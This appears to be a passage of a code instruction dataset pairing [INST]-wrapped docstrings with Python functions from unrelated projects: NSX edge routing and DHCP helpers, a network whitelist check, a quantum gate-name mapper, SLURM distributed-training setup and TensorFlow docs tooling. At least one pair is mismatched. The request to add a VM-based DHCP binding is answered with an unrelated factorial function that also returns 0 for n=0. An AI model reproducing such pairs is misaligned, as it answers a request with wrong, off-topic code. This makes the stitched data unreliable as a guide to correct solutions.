read_response=SUCCESS_RESPONSE, + create_response=create_response + ) + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + read_response=read_response, + read_args=read_args, read_kwargs=read_kwargs, + create_response=create_response, + create_args=create_args, create_kwargs=create_kwargs + ) + runtime = self.fake_ctx.instance.runtime_properties + self.assertEqual( + runtime['resource_id'], + resource_id + ) +[INST] for functions when we only run delete directly. [/INST] def _common_uninstall_delete( + self, resource_id, func_call, func_kwargs, delete_args, delete_kwargs, + additional_params=None, read_args=None, read_kwargs=None, + read_response=None + ): + self._common_uninstall_external_and_unintialized( + resource_id, func_call, func_kwargs, + additional_params=additional_params + ) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + resource_id, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + read_response=read_response, + delete_response=SUCCESS_RESPONSE + ) + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + read_response=read_response, + read_args=read_args, read_kwargs=read_kwargs, + delete_response=SUCCESS_RESPONSE, + delete_args=delete_args, delete_kwargs=delete_kwargs + ) + self.assertEqual(self.fake_ctx.instance.runtime_properties, {}) +[INST] delete when read/update enought. [/INST] def _common_uninstall_read_update( + self, resource_id, func_call, func_kwargs, read_args, read_kwargs, + read_response, update_args, update_kwargs, additional_params=None + ): + self._common_uninstall_external_and_unintialized( + resource_id, func_call, func_kwargs, + additional_params=additional_params + ) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + resource_id, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + read_response=read_response, + update_response=SUCCESS_RESPONSE + ) + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + read_response=read_response, + read_args=read_args, read_kwargs=read_kwargs, + update_response=SUCCESS_RESPONSE, + update_args=update_args, update_kwargs=update_kwargs + ) + self.assertEqual(self.fake_ctx.instance.runtime_properties, {}) +[INST] This function adds an interface gw to one dlr. [/INST] def dlr_add_interface(client_session, dlr_id, interface_ls_id, interface_ip, + interface_subnet, name=None, vnic=None): + dlr_interface_dict = client_session.extract_resource_body_example( + 'interfaces', 'create' + ) + interface = dlr_interface_dict['interfaces']['interface'] + interface['addressGroups']['addressGroup']['primaryAddress'] = interface_ip + interface['addressGroups']['addressGroup']['subnetMask'] = interface_subnet + interface['isConnected'] = "true" + interface['connectedToId'] = interface_ls_id + interface['name'] = name + interface['index'] = vnic + result_raw = client_session.create( + 'interfaces', uri_parameters={'edgeId': dlr_id}, + query_parameters_dict={'action': "patch"}, + request_body_dict=dlr_interface_dict + ) + common.check_raw_result(result_raw) + ifindex = result_raw['body']['interfaces']['interface']['index'] + resource_id = "%s|%s" % (ifindex, dlr_id) + return ifindex, resource_id +[INST] This function sets the default firewall rule to accept or deny. [/INST] def esg_fw_default_set(client_session, esg_id, def_action, + logging_enabled=None): + if not logging_enabled: + logging_enabled = 'false' + def_policy_body = client_session.extract_resource_body_example( + 'defaultFirewallPolicy', 'update' + ) + firewall_default_policy = def_policy_body['firewallDefaultPolicy'] + firewall_default_policy['action'] = def_action + firewall_default_policy['loggingEnabled'] = logging_enabled + cfg_result = client_session.update('defaultFirewallPolicy', + uri_parameters={'edgeId': esg_id}, + request_body_dict=def_policy_body) + common.check_raw_result(cfg_result) +[INST] This function deletes an interface gw to one dlr. [/INST] def dlr_del_interface(client_session, resource_id): + try: + ifindex, dlr_id = resource_id.split("|") + except Exception as ex: + raise cfy_exc.NonRecoverableError( + 'Unexpected error retrieving resource ID: %s' % str(ex) + ) + result_raw = client_session.delete( + 'interfaces', uri_parameters={'edgeId': dlr_id}, + query_parameters_dict={ + 'index': ifindex + }) + common.check_raw_result(result_raw) +[INST] This function deletes a default gw to one dlr. [/INST] def dlr_del_dgw(client_session, resource_id): + result_raw = client_session.delete('routingConfig', + uri_parameters={'edgeId': resource_id}) + common.check_raw_result(result_raw) +[INST] This function enables/disables the DHCP server on an Edge Gateway +and sets the logging status and Level. [/INST] def dhcp_server(client_session, esg_id, enabled=None, syslog_enabled=None, + syslog_level=None): + change_needed = False + raw_result = client_session.read( + 'dhcp', uri_parameters={'edgeId': esg_id}) + common.check_raw_result(raw_result) + current_dhcp_config = raw_result['body'] + new_dhcp_config = current_dhcp_config + if enabled: + if current_dhcp_config['dhcp']['enabled'] == 'false': + new_dhcp_config['dhcp']['enabled'] = 'true' + change_needed = True + else: + if current_dhcp_config['dhcp']['enabled'] == 'true': + new_dhcp_config['dhcp']['enabled'] = 'false' + change_needed = True + if syslog_enabled == 'true': + if current_dhcp_config['dhcp']['logging']['enable'] == 'false': + new_dhcp_config['dhcp']['logging']['enable'] = 'true' + change_needed = True + elif syslog_enabled == 'false': + if current_dhcp_config['dhcp']['logging']['enable'] == 'true': + new_dhcp_config['dhcp']['logging']['enable'] = 'false' + change_needed = True + if syslog_level: + if current_dhcp_config['dhcp']['logging']['logLevel'] != syslog_level: + new_dhcp_config['dhcp']['logging']['logLevel'] = syslog_level + change_needed = True + if change_needed: + result = client_session.update('dhcp', + uri_parameters={'edgeId': esg_id}, + request_body_dict=new_dhcp_config) + common.check_raw_result(result) +[INST] This function configures vnic interfaces on ESGs. [/INST] def esg_cfg_interface(client_session, esg_id, ifindex, ipaddr=None, + netmask=None, prefixlen=None, name=None, mtu=None, + is_connected=None, portgroup_id=None, vnic_type=None, + enable_send_redirects=None, enable_proxy_arp=None, + secondary_ips=None): + vnic_config = client_session.read( + 'vnic', uri_parameters={'index': ifindex, 'edgeId': esg_id} + )['body'] + if not mtu: + mtu = 1500 + if not vnic_type: + vnic_type = 'internal' + vnic_config['vnic']['mtu'] = mtu + vnic_config['vnic']['type'] = vnic_type + if name: + vnic_config['vnic']['name'] = name + if portgroup_id: + vnic_config['vnic']['portgroupId'] = portgroup_id + if enable_send_redirects: + vnic_config['vnic']['enableSendRedirects'] = enable_send_redirects + if enable_proxy_arp: + vnic_config['vnic']['enableProxyArp'] = enable_proxy_arp + if is_connected: + vnic_config['vnic']['isConnected'] = is_connected + if ipaddr and (netmask or prefixlen): + address_group = {} + sec_ips = [] + if netmask: + address_group['subnetMask'] = netmask + if prefixlen: + address_group['subnetPrefixLength'] = str(prefixlen) + if secondary_ips: + sec_ips = secondary_ips + address_group['primaryAddress'] = ipaddr + address_group['secondaryAddresses'] = {'ipAddress': sec_ips} + vnic_config['vnic']['addressGroups'] = {'addressGroup': address_group} + cfg_result = client_session.update( + 'vnic', uri_parameters={'index': ifindex, 'edgeId': esg_id}, + request_body_dict=vnic_config) + common.check_raw_result(cfg_result) + return ifindex, "%s|%s" % (ifindex, esg_id) +[INST] This function resets the vnic configuration of an ESG to its default +state. [/INST] def esg_clear_interface(client_session, resource_id): + try: + ifindex, esg_id = resource_id.split("|") + except Exception as ex: + raise cfy_exc.NonRecoverableError( + 'Unexpected error retrieving resource ID: %s' % str(ex) + ) + vnic_config = client_session.read( + 'vnic', uri_parameters={'index': ifindex, 'edgeId': esg_id} + )['body'] + vnic_config['vnic']['mtu'] = '1500' + vnic_config['vnic']['type'] = 'internal' + vnic_config['vnic']['name'] = 'vnic{}'.format(ifindex) + vnic_config['vnic']['addressGroups'] = None + vnic_config['vnic']['portgroupId'] = None + vnic_config['vnic']['portgroupName'] = None + vnic_config['vnic']['enableProxyArp'] = 'false' + vnic_config['vnic']['enableSendRedirects'] = 'false' + vnic_config['vnic']['isConnected'] = 'false' + cfg_result = client_session.update( + 'vnic', uri_parameters={'index': ifindex, 'edgeId': esg_id}, + request_body_dict=vnic_config) + common.check_raw_result(cfg_result) +[INST] This function clears the default gateway config on an ESG. [/INST] def esg_dgw_clear(client_session, resource_id): + try: + esg_id, _ = resource_id.split("|") + except Exception as ex: + raise cfy_exc.NonRecoverableError( + 'Unexpected error retrieving resource ID: %s' % str(ex) + ) + rtg_cfg = client_session.read( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id} + )['body'] + rtg_cfg['staticRouting']['defaultRoute'] = None + cfg_result = client_session.update( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id}, + request_body_dict=rtg_cfg + ) + common.check_raw_result(cfg_result) +[INST] This function sets the default gateway on an ESG. [/INST] def esg_dgw_set(client_session, esg_id, dgw_ip, vnic, mtu=None, + admin_distance=None): + if not mtu: + mtu = '1500' + if not admin_distance: + admin_distance = '1' + rtg_cfg = client_session.read( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id} + )['body'] + rtg_cfg['staticRouting']['defaultRoute'] = { + 'vnic': vnic, 'gatewayAddress': dgw_ip, + 'adminDistance': admin_distance, 'mtu': mtu + } + cfg_result = client_session.update( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id}, + request_body_dict=rtg_cfg + ) + common.check_raw_result(cfg_result) + return "%s|%s" % (esg_id, dgw_ip) +[INST] This function adds a static route to an ESG. [/INST] def esg_route_add(client_session, esg_id, network, next_hop, vnic=None, + mtu=None, admin_distance=None, description=None): + if not mtu: + mtu = '1500' + if not admin_distance: + admin_distance = '1' + rtg_cfg = client_session.read( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id} + )['body'] + if rtg_cfg['staticRouting']['staticRoutes']: + routes = client_session.normalize_list_return( + rtg_cfg['staticRouting']['staticRoutes']['route'] + ) + else: + routes = [] + new_route = { + 'vnic': vnic, 'network': network, 'nextHop': next_hop, + 'adminDistance': admin_distance, 'mtu': mtu, + 'description': description + } + routes.append(new_route) + rtg_cfg['staticRouting']['staticRoutes'] = {'route': routes} + cfg_result = client_session.update( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id}, + request_body_dict=rtg_cfg + ) + common.check_raw_result(cfg_result) + return "%s|%s|%s" % (esg_id, network, next_hop) +[INST] This function deletes a static route to an ESG. [/INST] def esg_route_del(client_session, resource_id): + try: + esg_id, network, next_hop = resource_id.split("|") + except Exception as ex: + raise cfy_exc.NonRecoverableError( + 'Unexpected error retrieving resource ID: %s' % str(ex) + ) + rtg_cfg = client_session.read( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id} + )['body'] + if rtg_cfg['staticRouting']['staticRoutes']: + routes = client_session.normalize_list_return( + rtg_cfg['staticRouting']['staticRoutes']['route'] + ) + else: + ctx.logger.info("No static routes") + return + routes_filtered = [ + route for route in routes if not ( + route['network'] == network and route['nextHop'] == next_hop + ) + ] + if len(routes_filtered) == len(routes): + ctx.logger.info( + "Wrong number of routes, i have not found any for delete" + ) + return + rtg_cfg['staticRouting']['staticRoutes'] = {'route': routes_filtered} + cfg_result = client_session.update( + 'routingConfigStatic', uri_parameters={'edgeId': esg_id}, + request_body_dict=rtg_cfg + ) + common.check_raw_result(cfg_result) +[INST] This function adds a DHCP Pool to an edge DHCP Server. [/INST] def add_dhcp_pool(client_session, esg_id, ip_range, default_gateway=None, + subnet_mask=None, domain_name=None, dns_server_1=None, + dns_server_2=None, lease_time=None, auto_dns=None): + dhcp_pool_dict = {'ipRange': ip_range, + 'defaultGateway': default_gateway, + 'subnetMask': subnet_mask, + 'domainName': domain_name, + 'primaryNameServer': dns_server_1, + 'secondaryNameServer': dns_server_2, + 'leaseTime': lease_time, + 'autoConfigureDNS': auto_dns} + result = client_session.create( + 'dhcpPool', uri_parameters={'edgeId': esg_id}, + request_body_dict={'ipPool': dhcp_pool_dict} + ) + common.check_raw_result(result) + return "%s|%s" % (esg_id, result['objectId']) +[INST] This function deletes a DHCP Pools from an edge DHCP Server. [/INST] def delete_dhcp_pool(client_session, resource_id): + try: + esg_id, pool_id = resource_id.split("|") + except Exception as ex: + raise cfy_exc.NonRecoverableError( + 'Unexpected error retrieving resource ID: %s' % str(ex) + ) + result = client_session.delete( + 'dhcpPoolID', uri_parameters={'edgeId': esg_id, 'poolID': pool_id}) + common.check_raw_result(result) +[INST] This function add a MAC based static binding entry to an edge DHCP Server. [/INST] def add_mac_binding(client_session, esg_id, mac, hostname, ip, + default_gateway=None, subnet_mask=None, domain_name=None, + dns_server_1=None, dns_server_2=None, lease_time=None, + auto_dns=None): + binding_dict = { + 'macAddress': mac, 'hostname': hostname, 'ipAddress': ip, + 'defaultGateway': default_gateway, 'subnetMask': subnet_mask, + 'domainName': domain_name, 'primaryNameServer': dns_server_1, + 'secondaryNameServer': dns_server_2, 'leaseTime': lease_time, + 'autoConfigureDNS': auto_dns + } + result = client_session.create( + 'dhcpStaticBinding', uri_parameters={'edgeId': esg_id}, + request_body_dict={'staticBinding': binding_dict} + ) + common.check_raw_result(result) + return "%s|%s" % (esg_id, result['objectId']) +[INST] This function add a VM based static binding entry to an edge DHCP Server. [/INST] def factorial(n): if n == 0: return 0 elif n == 1: return 1 else: return n * factorial(n - 1) print(factorial(5)) +[INST] This function deletes a DHCP binding from an edge DHCP Server. [/INST] def delete_dhcp_binding(client_session, resource_id): + try: + esg_id, bindingID = resource_id.split("|") + except Exception as ex: + raise cfy_exc.NonRecoverableError( + 'Unexpected error retrieving resource ID: %s' % str(ex) + ) + result = client_session.delete( + 'dhcpStaticBindingID', + uri_parameters={'edgeId': esg_id, 'bindingID': bindingID} + ) + common.check_raw_result(result) +[INST] we need such because nsxclient does not support unicode strings. [/INST] def _cleanup_properties(value): + if isinstance(value, unicode): + return str(value) + if isinstance(value, dict): + return _cleanup_properties_dict(value) + if isinstance(value, list): + return _cleanup_properties_list(value) + return value +[INST] convert all fields in dict to string. [/INST] def _cleanup_properties_dict(properties_dict): + result = {} + for key in properties_dict.iterkeys(): + value = properties_dict[key] + if isinstance(key, (unicode, int)): + key = str(key) + result[key] = _cleanup_properties(value) + return result +[INST] return None if all fileds is empty, else origin dict. [/INST] def _cleanup_if_empty(value): + if any(value[key] is not None for key in value): + return value + else: + return None +[INST] Common code for delete object with client/resource_id params. [/INST] def delete_object(func_call, element_struct, kwargs, elements_to_clean=None): + use_existing, _ = get_properties(element_struct, kwargs) + if use_existing: + remove_properties(element_struct) + if elements_to_clean: + for name in elements_to_clean: + remove_properties(name) + ctx.logger.info("Used existed") + return + resource_id = ctx.instance.runtime_properties.get('resource_id') + if not resource_id: + remove_properties(element_struct) + if elements_to_clean: + for name in elements_to_clean: + remove_properties(name) + ctx.logger.info("Not fully created, skip") + return + client_session = nsx_login(kwargs) + attempt_with_rerun( + func_call, + client_session=client_session, + resource_id=resource_id + ) + ctx.logger.info("delete %s" % resource_id) + remove_properties(element_struct) + if elements_to_clean: + for name in elements_to_clean: + remove_properties(name) +[INST] Rerun func several times, useful after dlr/esg delete. [/INST] def attempt_with_rerun(func, **kwargs): + i = 10 + while i >= 0: + try: + func(**kwargs) + return + except cfy_exc.RecoverableError as ex: + ctx.logger.error("%s: %s attempts left: Message: %s " % ( + func.__name__, i, str(ex) + )) + if not i: + raise cfy_exc.RecoverableError( + message="Retry %s little later" % func.__name__ + ) + time.sleep(30) + i -= 1 +[INST] Get login configs from default file. [/INST] def _nsx_login_file(): + cfg = {} + if os.path.isfile(DEFAULT_CONFIG_PATH): + try: + with open(DEFAULT_CONFIG_PATH) as f: + cfg = yaml.load(f.read()) + except Exception as e: + raise cfy_exc.NonRecoverableError( + "Unable to read %s configuration file %s." % ( + str(e), + DEFAULT_CONFIG_PATH + ) + ) + if not isinstance(cfg, dict): + raise cfy_exc.NonRecoverableError( + "Unable to parse configuration file %s." % DEFAULT_CONFIG_PATH + ) + return cfg +[INST] Use values form properties/of file for login to nsx. [/INST] def nsx_login(kwargs): + if ctx.type == NODE_INSTANCE: + nsx_auth = _get_properties('nsx_auth', kwargs) + else: + nsx_auth = kwargs.get('nsx_auth') + ctx.logger.info("NSX login...") + cfg_auth = _nsx_login_file() + cfg_auth.update(nsx_auth) + user = cfg_auth.get('username') + password = cfg_auth.get('password') + ip = cfg_auth.get('host') + if not ip and ctx.type == NODE_INSTANCE: + ip = ctx.instance.host_ip + ctx.logger.info("Used host from container: %s" % ip) + ctx.logger.info("Used %s@%s" % (user, ip)) + if not ip or not user or not password: + raise cfy_exc.NonRecoverableError( + "please check your credentials" + ) + raml_file = cfg_auth.get('raml') + if not raml_file: + resource_dir = resource_filename(__name__, 'api_spec') + raml_file = '{}/nsxvapi.raml'.format(resource_dir) + ctx.logger.info("Will be used internal: %s" % raml_file) + client = NsxClient(raml_file, ip, user, password) + ctx.logger.info("NSX logged in") + return client +[INST] check that we have 'success' http status. [/INST] def check_raw_result(result_raw): + if result_raw['status'] < 200 or result_raw['status'] >= 300: + ctx.logger.error("Status %s" % result_raw['status']) + raise cfy_exc.NonRecoverableError( + "We have error with request." + ) +[INST] run client_session.read(searched_resource, **kwargs) with checks +and return only result selected by path. [/INST] def nsx_read(client_session, path, searched_resource, **kwargs): + raw_result = client_session.read( + searched_resource, **kwargs + ) + check_raw_result(raw_result) + path_list = path.split("/") + selected_obj = raw_result + for path in path_list: + if path not in selected_obj: + return None + selected_obj = selected_obj[path] + else: + return selected_obj +[INST] create path to searched part and convert part to list. [/INST] def nsx_struct_get_list(nsx_object, path): + path_list = path.split("/") + selected_obj = nsx_object + for path in path_list[:-1]: + if path not in selected_obj: + selected_obj[path] = {} + selected_obj = selected_obj[path] + last_part = path_list[-1] + if last_part not in selected_obj: + selected_obj[last_part] = [] + if isinstance(selected_obj[last_part], dict): + selected_obj[last_part] = [selected_obj[last_part]] + return selected_obj[last_part] +[INST] This function will check the last scan for any devices that are not listed in the whitelist.. [/INST] def validateHost(): + c = conn.cursor() + c.execute("select distinct id from scans order by 1 desc limit 1;") + row = c.fetchone() + count = 0 + if row: + c.execute("select * from scans where id = "+str(row[0])+" and mac not in (select mac from whitelist);") + rows = c.fetchall() + for row in rows: + print("Intruder detected in scan [%d] IP:[%s] MAC:[%s] VENDOR:[%s]" % (row[0], row[1], row[2], row[3])) + count = count+1 + return count +[INST] Tries to convert an OpenQL platform JSON file to a gatemap JSON file for +use with the DQCsim operator wrapper for OpenQL. Heuristics are applied to +convert common gate names to DQCsim equivalents, but you may need to do +some manual adjusting.. [/INST] def platform2gates(platform_fname, gates_fname): + with open(platform_fname, 'r') as f: + data = json.loads(f.read()) + insns = [] + for name in data.get('instructions', []): + insns.append(name.split()[0]) + for name, decomp in data.get('gate_decomposition', {}).items(): + insns.append(name.split()[0]) + for name in decomp: + insns.append(name.split()[0]) + if not insns: + print('No instructions found!') + new_insns = [] + seen = set() + for insn in insns: + if insn not in seen: + seen.add(insn) + new_insns.append(insn) + insns = new_insns + unknown_gates = set() + def to_json_line(openql): + dqcsim = { + 'i': '"I"', + 'x': '"X"', + 'y': '"Y"', + 'z': '"Z"', + 'h': '"H"', + 's': '"S"', + 'sdag': '"S_DAG"', + 't': '"T"', + 'tdag': '"T_DAG"', + 'x90': '"RX_90"', + 'xm90': '"RX_M90"', + 'mx90': '"RX_M90"', + 'x180': '"RX_180"', + 'rx90': '"RX_90"', + 'rxm90': '"RX_M90"', + 'rx180': '"RX_180"', + 'rx': '"RX"', + 'y90': '"RY_90"', + 'ym90': '"RY_M90"', + 'my90': '"RY_M90"', + 'y180': '"RY_180"', + 'ry90': '"RY_90"', + 'rym90': '"RY_M90"', + 'ry180': '"RY_180"', + 'ry': '"RY"', + 'z90': '"RZ_90"', + 'zm90': '"RZ_M90"', + 'mz90': '"RZ_M90"', + 'z180': '"RZ_180"', + 'rz90': '"RZ_90"', + 'rzm90': '"RZ_M90"', + 'rz180': '"RZ_180"', + 'rz': '"RZ"', + 'swap': '"SWAP"', + 'move': '"SWAP"', + 'sqswap': '"SQSWAP"', + 'sqrtswap': '"SQSWAP"', + 'cx': '"C-X"', + 'ccx': '"C-C-X"', + 'cy': '"C-Y"', + 'ccy': '"C-C-Y"', + 'cz': '"C-Z"', + 'ccz': '"C-C-Z"', + 'cphase': '"C-PHASE"', + 'ccphase': '"C-C-PHASE"', + 'cnot': '"C-X"', + 'ccnot': '"C-C-X"', + 'toffoli': '"C-C-X"', + 'cswap': '"C-SWAP"', + 'fredkin': '"C-SWAP"', + 'meas': '"measure"', + 'measx': '{\n "type": "measure",\n "basis": "x"\n }', + 'measy': '{\n "type": "measure",\n "basis": "y"\n }', + 'measz': '"measure"', + 'prep': '"prep"', + 'prepx': '{\n "type": "prep",\n "basis": "x"\n }', + 'prepy': '{\n "type": "prep",\n "basis": "y"\n }', + 'prepz': '"prep"', + }.get( + openql + .replace('_', '') + .replace('-', '') + .replace('measure', 'meas') + .lower(), + None) + if dqcsim is None: + unknown_gates.add(openql) + dqcsim = '{\n UNKNOWN?\n }' + openql = '"{}":'.format(openql) + return ' {} {},'.format(openql, dqcsim) + output = ['{'] + for insn in insns: + output.append(to_json_line(insn)) + if output: + output[-1] = output[-1][:-1] + output.append('}') + output = '\n'.join(output) + with open(gates_fname, 'w') as f: + f.write(output) + if unknown_gates: + print('The following gates were not automatically recognized:') + print() + for gate in sorted(unknown_gates): + print(' - {}'.format(gate)) + print() + print('You\'ll need to edit the output file!') + else: + print('All gates were heuristically recognized! Double-check the file, though.') +[INST] Command-line entry point for the platform2gates utility.. [/INST] def platform2gates_cli(): + if len(sys.argv) != 3: + print('Usage: platform2gates ') + print() + print('\n'.join(map(str.strip, platform2gates.__doc__.split('\n')))) + print() + print('This is part of the dqcsim-openql-mapper Python3/pip package.') + sys.exit(1) + platform2gates(sys.argv[1], sys.argv[2]) +[INST] Runs the Deutsch-Jozsa algorithm on the given oracle. The oracle is +called with the input and output qubits as positional arguments.. [/INST] def deutsch_jozsa(self, qi, qo, oracle, expected): + self.prepare(qi) + self.h_gate(qi) + self.prepare(qo) + self.x_gate(qo) + self.h_gate(qo) + oracle(qi, qo) + self.h_gate(qi) + self.measure(qi) + if self.get_measurement(qi).value: + self.info('Oracle was balanced!') + if expected != 'balanced': + raise ValueError('unexpected oracle result!') + else: + self.info('Oracle was constant!') + if expected != 'constant': + raise ValueError('unexpected oracle result!') +[INST] r"""Heuristic to determine if a slurm job is a batch job or not. Batch jobs +will have a job name that is not a shell unless the user specifically set the job +name to that of a shell. Interactive jobs have a shell name as their job name.. [/INST] def is_slurm_batch_job() -> bool: + return is_slurm_job() and os.environ.get("SLURM_JOB_NAME", None) not in ( + None, + "bash", + "zsh", + "fish", + "tcsh", + "sh", + ) +[INST] r"""Saves the interrupted job state to the specified filename. +This is useful when working with preemptable job partitions. + +This method will do nothing if SLURM is not currently being used and the filename is the default. [/INST] def save_interrupted_state(state: Any, filename: str = None): + if SLURM_JOBID is None and filename is None: + logger.warn("SLURM_JOBID is none, not saving interrupted state") + return + if filename is None: + filename = INTERRUPTED_STATE_FILE + if not osp.exists(osp.dirname(INTERRUPTED_STATE_FILE)): + raise RuntimeError( + "Please create a .interrupted_states directory in your home directory for job preemption" + "(This is intentionally not created automatically as it can get quite large)" + ) + torch.save(state, filename) +[INST] r"""Initializes torch.distributed by parsing environment variables set +by SLURM when ``srun`` is used or by parsing environment variables set +by torch.distributed.launch. [/INST] def init_distrib_slurm( + backend: str = "nccl", +) -> Tuple[int, torch.distributed.TCPStore]: + assert ( + torch.distributed.is_available() + ), "torch.distributed must be available" + if "GLOO_SOCKET_IFNAME" not in os.environ: + os.environ["GLOO_SOCKET_IFNAME"] = get_ifname() + if "NCCL_SOCKET_IFNAME" not in os.environ: + os.environ["NCCL_SOCKET_IFNAME"] = get_ifname() + local_rank, world_rank, world_size = get_distrib_size() + master_port = int(os.environ.get("MASTER_PORT", DEFAULT_PORT)) + if SLURM_JOBID is not None: + master_port += int(SLURM_JOBID) % int( + os.environ.get("MASTER_PORT_RANGE", DEFAULT_PORT_RANGE) + ) + master_addr = os.environ.get("MASTER_ADDR", DEFAULT_MASTER_ADDR) + tcp_store = distrib.TCPStore( + master_addr, master_port, world_size, world_rank == 0 + ) + distrib.init_process_group( + backend, store=tcp_store, rank=world_rank, world_size=world_size + ) + return local_rank, tcp_store +[INST] Return the number of steps +necessary to calculate +`print countdown(n)`. [/INST] def time(n): + steps = 0 + steps += 3 + 2 * math.ceil(n / 5.0) + return steps +[INST] Updates keyboard and mouse input.. [/INST] def update(self): + for c in range(len(self.keyCodes)): + kc = self.keyCodes[c] + if kc is None: + continue + if "mouse_" in kc: + continue + else: + newstate = keyboard.is_pressed(kc) + if self.pressed[c] != newstate and newstate is True: + self.counts[c] += 1 + self.event_queue.append(time.time()) + self.pressed[c] = newstate + if keyboard.is_pressed(self.reset): + self.counts = [0 for x in range(len(self.keyCodes))] +[INST] Return a PageInfo object describing a given object from the TF API. +This function resolves `tf.symbol` references in the docstrings into links +to the appropriate location.. [/INST] def docs_for_object( + *, + api_node: doc_generator_visitor.ApiTreeNode, + parser_config: config.ParserConfig, + extra_docs: Optional[Dict[int, str]] = None, + search_hints: bool = True, + page_builder_classes: Optional[PageBuilderDict] = None, +) -> base_page.PageInfo: + if page_builder_classes is None: + page_builder_classes = _DEFAULT_PAGE_BUILDER_CLASSES + page_info_class = doc_controls.get_custom_page_builder_cls(api_node.py_object) + if page_info_class is None: + obj_type = obj_type_lib.ObjType.get(api_node.py_object) + page_info_class = page_builder_classes[obj_type] + page_info = page_info_class( + api_node=api_node, + search_hints=search_hints, + extra_docs=extra_docs, + parser_config=parser_config) + page_info.docs_for_object() + return page_info +[INST] Visits the `FunctionDef` node in AST tree and extracts the typehints.. [/INST] def visit_FunctionDef(self, node) -> None: + if node.returns: + self.return_annotation = _source_from_ast(node.returns) + for arg in node.args.args: + if arg.annotation: + self.annotations[arg.arg] = _source_from_ast(arg.annotation) + self.arguments_typehint_exists = True + for kwarg in node.args.kwonlyargs: + if kwarg.annotation: + self.annotations[kwarg.arg] = _source_from_ast(kwarg.annotation) + self.arguments_typehint_exists = True + last_n_pos_args = node.args.args[-1 * len(node.args.defaults):] + for arg, default_val in zip(last_n_pos_args, node.args.defaults): + if default_val is not None: + text_default_val = self._preprocess_default(default_val) + self.defaults[arg.arg] = text_default_val + for kwarg, default_val in zip(node.args.kwonlyargs, node.args.kw_defaults): + if default_val is not None: + text_default_val = self._preprocess_default(default_val) + self.defaults[kwarg.arg] = text_default_val +[INST] Vists an assignment with a type annotation. Dataclasses is an example.. [/INST] def visit_AnnAssign(self, node) -> None: + arg = _source_from_ast(node.target) + self.annotations[arg] = _source_from_ast(node.annotation) + if node.value is not None: + self.defaults[arg] = self._preprocess_default(node.value) +[INST] Vists an assignment with a type annotation. Dataclasses is an example.. [/INST] def visit_Assign(self, node) -> None: + names = [_source_from_ast(t) for t in node.targets] + if node.value is not None: + val = self._preprocess_default(node.value) + for name in names: + self.defaults[name] = val +[INST] Return a link to an object's api page if found.. [/INST] def maybe_add_link(self, source: str, value: Any) -> str: + cls = type(value) + value_name = self._reverse_index.get(id(value), None) + cls_name = self._reverse_index.get(id(cls), None) + if cls_name is not None: + before = source.split('(')[0] + cls_short_name = cls_name.split('.')[-1] + if before.endswith(cls_short_name): + return self.get_link(source, cls_name) + if value_name is not None: + return self.get_link(value_name, value_name) + return source +[INST] Links type annotations to its page if it exists.. [/INST] def preprocess(self, string: str, value: Any) -> str: + obj_anno_full_name = self._reverse_index.get(id(value), None) + if obj_anno_full_name is not None: + return self.get_link(obj_anno_full_name) + non_builtin_ast_types = self._get_non_builtin_ast_types(string) + try: + non_builtin_type_objs = self._extract_non_builtin_types(value, []) + except RecursionError: + non_builtin_type_objs = {} + if len(non_builtin_type_objs) != len(non_builtin_ast_types): + non_builtin_map = {} + else: + non_builtin_map = dict(zip(non_builtin_ast_types, non_builtin_type_objs)) + partial_func = functools.partial(self._linkify, non_builtin_map) + return self._INDIVIDUAL_TYPES_RE.sub(partial_func, string) +[INST] Creates a text representation of the args in a method/function.. [/INST] def format_args(self, args: List[inspect.Parameter]) -> List[str]: + args_text_repr = [] + for arg in args: + typeanno = None + if arg.annotation is not EMPTY: + value, source = arg.annotation + if source is not None: + typeanno = self.preprocess(source, value) + if typeanno: + args_text_repr.append(f'{arg.name}: {typeanno}') + else: + args_text_repr.append(f'{arg.name}') + return args_text_repr +[INST] Creates a text representation of the kwargs in a method/function.. [/INST] def format_kwargs(self, kwargs: List[inspect.Parameter]) -> List[str]: + kwargs_text_repr = [] + for kwarg in kwargs: + default_text = None + if kwarg.default is not EMPTY: + default_val, default_source = kwarg.default + if default_source is None: + default_source = strip_obj_addresses(repr(default_val)) + default_source = html.escape(default_source) + default_text = self.maybe_add_link(default_source, default_val) + typeanno = None + if kwarg.annotation is not EMPTY: + anno_value, anno_source = kwarg.annotation + if anno_source is not None: + typeanno = self.preprocess(anno_source, anno_value) + if typeanno is not None and default_text is not None: + kwargs_text_repr.append(f'{kwarg.name}: {typeanno} = {default_text}') + elif default_text is not None: + kwargs_text_repr.append(f'{kwarg.name}={default_text}') + elif typeanno is not None: + kwargs_text_repr.append(f'{kwarg.name}: {typeanno}') + else: + kwargs_text_repr.append(kwarg.name) + return kwargs_text_repr +[INST] Extract ast defaults and annotations form a dataclass.. [/INST] def _extract_class_defaults_and_annotations( + cls: Type[object]) -> AnnotsDefaultsReturns: + ast_visitor = _ClassDefaultAndAnnotationExtractor() + ast_visitor.extract(cls) + return (ast_visitor.annotations, ast_visitor.defaults, + ast_visitor.return_annotation) +[INST] Extract ast defaults and annotations form a standard callable.. [/INST] def _extract_arg_defaults_and_annotations( + func: Callable[..., Any]) -> AnnotsDefaultsReturns: + ast_visitor = _ArgDefaultAndAnnotationExtractor() + annotation_source_dict = {} + defaults_source_dict = {} + return_annotation_source = EMPTY + try: + ast_visitor.extract(func) + except Exception: + pass + else: + annotation_source_dict = ast_visitor.annotations + defaults_source_dict = ast_visitor.defaults + return_annotation_source = ast_visitor.return_annotation + return annotation_source_dict, defaults_source_dict, return_annotation_source +[INST] Extracts the decorators on top of functions/methods.. [/INST] def extract_decorators(func: Any) -> List[str]: + class ASTDecoratorExtractor(ast.NodeVisitor): 